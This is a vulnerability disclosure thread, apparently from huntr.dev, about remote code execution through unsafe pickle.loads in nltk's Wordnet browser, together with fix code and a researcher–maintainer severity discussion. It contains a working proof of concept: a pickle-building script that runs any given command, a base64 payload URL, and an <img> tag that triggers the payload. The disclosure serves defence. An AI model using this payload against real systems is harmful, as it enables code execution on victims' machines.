RCE in Wordnet Browser in nltk/nltk

Valid

Reported on

Dec 29th 2022


Description

A user who visits a malicious link while the wordnet browser is running will execute attacker-controlled code on their system.

Proof of Concept

Visit

http://localhost:8000/lookup_gASVKwAAAAAAAACMBXBvc2l4lIwGc3lzdGVtlJOUjBB0b3VjaCAvdG1wL1BXTkVElIWUUpQu

The base64 is created from

import pickle
import sys
import base64

DEFAULT_COMMAND = "touch /tmp/PWNED"
COMMAND = sys.argv[1] if len(sys.argv) > 1 else DEFAULT_COMMAND

class PickleRce(object):
    def __reduce__(self):
        import os
        return (os.system,(COMMAND,))

print(base64.b64encode(pickle.dumps(PickleRce())))

Visiting the link creates /tmp/PWNED on the system.

ls /tmp

PWNED

This is because nltk unsafely calls pickle.loads on data taken from the URL.
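One way to avoid this class of bug is to stop unpickling URL data altogether. The sketch below is illustrative only: it assumes the state carried in the URL is a word plus a JSON-serializable dict, and encode_reference and decode_reference are hypothetical names, not nltk functions. JSON can only produce plain data (strings, numbers, lists, dicts), so decoding a token cannot trigger a call into os.system or any other callable.

```python
import base64
import json


def encode_reference(word, synset_relations):
    """Serialize page state to a URL-safe token without using pickle."""
    payload = json.dumps([word, synset_relations], separators=(",", ":"))
    return base64.urlsafe_b64encode(payload.encode("utf-8")).decode("ascii")


def decode_reference(token):
    """Parse a token taken from the URL; malformed input raises ValueError."""
    try:
        raw = base64.urlsafe_b64decode(token.encode("ascii"))
        word, synset_relations = json.loads(raw.decode("utf-8"))
    except (ValueError, TypeError) as exc:
        # Covers bad base64, non-UTF-8 bytes, invalid JSON and wrong shapes.
        raise ValueError("invalid reference token") from exc
    if not isinstance(word, str) or not isinstance(synset_relations, dict):
        raise ValueError("invalid reference token")
    return word, synset_relations


if __name__ == "__main__":
    # Hypothetical example state; the real shape used by nltk may differ.
    token = encode_reference("dog", {"dog.n.01": ["hypernym"]})
    print(token)
    print(decode_reference(token))
```

The trade-off is that sets and custom classes need an explicit conversion to lists or dicts before encoding.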

Impact

Remote code execution (RCE) by inducing a user to visit a link.

Occurrences

nltk is unsafely using pickle.loads here

We are processing your report and will contact the nltk team within 24 hours. 11 days ago
haxatron
11 days ago

Researcher


Wordnet browser can be started by:

nltk.app.wordnet_app.app()
haxatron
11 days ago

Researcher


This vulnerability is concerning because a victim only needs to load a malicious img tag on their computer while their wordnet browser is open for malicious code to execute.

In the previous report, the maintainer mentioned never having heard of anyone using it, but the GitHub issue thread https://github.com/nltk/nltk/issues/3002 proves otherwise: there are still people using the wordnet browser, and they are vulnerable to RCE.

haxatron
11 days ago

Researcher


Some guidance on how to fix this: https://docs.python.org/3.7/library/pickle.html#pickle.Unpickler.find_class

haxatron
11 days ago

Researcher


And https://docs.python.org/3.7/library/pickle.html#pickle-restrict
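Following the two documentation links above, a minimal sketch of a restricted unpickler might look like this. The names RestrictedUnpickler and restricted_loads are illustrative and not taken from nltk. This version assumes the pickled data consists only of built-in containers and scalars, so it rejects every global lookup instead of maintaining an allow-list.

```python
import io
import pickle


class RestrictedUnpickler(pickle.Unpickler):
    """Unpickler that refuses to resolve any global (class or function)."""

    def find_class(self, module, name):
        # Called whenever the pickle stream references a global such as
        # os.system. Rejecting every lookup leaves only plain built-in
        # containers and scalars loadable.
        raise pickle.UnpicklingError(f"global '{module}.{name}' is forbidden")


def restricted_loads(data: bytes):
    """Analogue of pickle.loads() that goes through RestrictedUnpickler."""
    return RestrictedUnpickler(io.BytesIO(data)).load()


if __name__ == "__main__":
    # Plain data (tuples, strings, dicts) still round-trips.
    print(restricted_loads(pickle.dumps(("dog", {"hypernym": True}))))

    # Anything that needs a global lookup is rejected before it is called.
    # The built-in len is used here as a harmless stand-in.
    try:
        restricted_loads(pickle.dumps(len))
    except pickle.UnpicklingError as exc:
        print("rejected:", exc)
```

If some classes do need to be loadable, find_class can instead return them from an explicit allow-list, as the second link describes.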

Tom Aarsen gave praise 11 days ago
The researcher's credibility has slightly increased as a result of the maintainer's thanks: +1
haxatron
11 days ago

Researcher


Just my 2 cents, I don't think that this should be low. I agree that the severity for the previous report https://huntr.dev/bounties/861a8d11-0fe9-4c2f-9112-af3a9559fa87/ should be set to low, as the XSS is not really useful for an attacker (there are no cookies for the application). But this one involves an RCE which can be triggered just by visiting any page online that contains a malicious <img> tag.

I think https://github.com/nltk/nltk/issues/3002 is evidence enough that people are indeed still using the Wordnet browser today. And, these people who are still using the wordnet browser should be concerned about this issue and upgrade their browser to prevent other people from executing malicious code on their systems. That this critical error remained undetected for 13 years is not a good justification as users of the browser are not typically security researchers. I would lean towards this being High due to the possible RCE impact (at minimum) with a big disclaimer that this only affects users of the wordnet browser.

But again, just my 2 cents.

haxatron
11 days ago

Researcher


^ Correction: I would lean towards this being High (at minimum) due to the possible RCE impact

Tom Aarsen
10 days ago

Maintainer


"That this critical error remained undetected for 13 years is not a good justification as users of the browser are not typically security researchers."

The critical error that I was referring to was the lack of parentheses in the line shown in https://github.com/nltk/nltk/issues/3002. This critical error would prevent the wordnet browser from working in normal circumstances, and would be detected by any user, not just concerned researchers like yourself. I stand by my belief that the wordnet browser is rarely used.

However, I'm not unreasonable. I am open to a discussion on what the severity of this report ought to be, and I recognize that there are differences between this report and the former. In particular:

  1. This vulnerability is much more severe.
  2. This report has the benefit of a compound effect: I'm more inclined to notify users now that there have been two vulnerabilities in the wordnet browser.

I'm not very well aware of the img tag attack, could you elaborate on that?

We have contacted a member of the nltk team and are waiting to hear back 10 days ago
haxatron
10 days ago

Researcher


I wasn't aware that https://github.com/nltk/nltk/issues/3002 fixed quite a major bug. Apologies for that. In that case, I'd agree with you that the app is rarely used.

"I'm not very well aware of the img tag attack, could you elaborate on that?"

What I meant is that, for RCE to occur, someone would only need to come across this HTML (in another tab, of course) while the Wordnet browser is running:

<img src="http://localhost:8000/lookup_gASVKwAAAAAAAACMBXBvc2l4lIwGc3lzdGVtlJOUjBB0b3VjaCAvdG1wL1BXTkVElIWUUpQu">
haxatron
10 days ago

Researcher


In normal circumstances, I would consider this a critical/high vulnerability, given that huntr's scope covers the entire repository and this is a documented API (just not a widely used one). But as you've mentioned, this module may be rarely used.

I do think there is a possibility of future impact, where users might stumble upon wordnet_app and start to use it, as mentioned in the Github issue. Taking this into account, I think medium would be fine for this vulnerability. Do you agree?

haxatron modified the report
10 days ago
haxatron
10 days ago

Researcher


Alternatively, we can also go with High and point out that only the rarely used wordnet app is affected as @psmoros pointed out in the other thread.

@psmoros it may be better to provide maintainers with the ability to set an "environment" score which reflects how many users would be affected by usage of an API and adjust the score based on that -- sort of like what Hackerone does

Tom Aarsen modified the Severity from Medium (5) to Low (3.9) 7 days ago
Tom Aarsen modified the Severity from Low (3.9) to Medium (5) 7 days ago
The researcher has received a minor penalty to their credibility for miscalculating the severity: -1
Tom Aarsen validated this vulnerability 7 days ago

I've discussed it with the team, and we have decided to remove the Wordnet Browser from NLTK (and move it to https://github.com/nltk/nltk_contrib/). As a result, I don't deem it necessary to push out a CVE notifying users to update to a new version, as there will only be one version with the fixes (3.8.1) before we remove the functionality altogether. After some consideration I've decided to leave the severity at the level that you suggested, and I'll leave the final judgement for the CVE to Huntr.

I apologize for the consequences for your credibility and disclosure bounty from the reduction in severity. I appreciate the time and effort that you put into this report.

cc: @admin

haxatron has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Tom Aarsen marked this as fixed in 3.8.1 with commit 50be0b 7 days ago
Tom Aarsen has been awarded the fix bounty
This vulnerability will not receive a CVE
Tom Aarsen published this vulnerability 7 days ago
wordnet_app.py#L697 has been validated
haxatron
7 days ago

Researcher


No worries at all! I am satisfied with your judgement! :)
